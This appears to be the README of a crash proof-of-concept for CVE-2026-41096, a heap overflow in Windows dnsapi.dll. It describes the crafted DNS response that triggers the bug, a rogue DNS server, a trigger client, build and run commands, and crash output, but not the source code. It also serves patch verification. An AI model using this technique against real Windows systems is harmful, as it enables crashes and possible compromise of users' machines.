Share
## https://sploitus.com/exploit?id=74CC6AFB-86FC-5129-80CC-141F1D29B338
# CVE-2026-41096 - Crash PoC

Heap overflow in `DnsRawTruncateMessageForUdp()` (dnsapi.dll). A crafted DNS response with `QDCOUNT=0` and a large OPT record causes a 604-byte heap overflow when the truncation logic miscalculates the destination pointer.

**MSRC advisory:** https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

## Components

| File | Description |
|---|---|
| `rogue_dns_server.py` | Rogue DNS server (Python 3). Replies to every query with a QDCOUNT=0 + OPT response (623 bytes). |
| `trigger_client.c` | Trigger client (C/Win32). Calls `DnsQueryRaw` pointed at the rogue server. Catches the crash via `SetUnhandledExceptionFilter`. |

## Requirements

**Attacker (rogue server):**
- Python 3
- Root/admin (port 53)

**Victim (trigger client):**
- Windows OS with DnsCache service (needs `DnsQueryRaw`)
- Vulnerable version of `dnsapi.dll`
- Visual Studio / Windows SDK (to build)

## Usage

**1. Start the rogue server:**

```bash
sudo python3 rogue_dns_server.py
```

**2. Build and run the trigger client:**

```cmd
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe 
```

**3. (Optional) Enable Page Heap for a deterministic crash:**

```cmd
gflags /p /enable trigger_client.exe /full
trigger_client.exe 
```

## Exit Codes

| Code | Meaning |
|---|---|
| 0 | System is patched (`DNS_ERROR_BAD_PACKET` returned cleanly) |
| 1 | Error (DnsQueryRaw not found, network issue, etc.) |
| 2 | Crash detected (heap overflow confirmed) |

## Example Output

**Vulnerable (Page Heap):**

```
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.
```

**Vulnerable (no Page Heap):**

```
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.
```

**Patched:**

```
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
```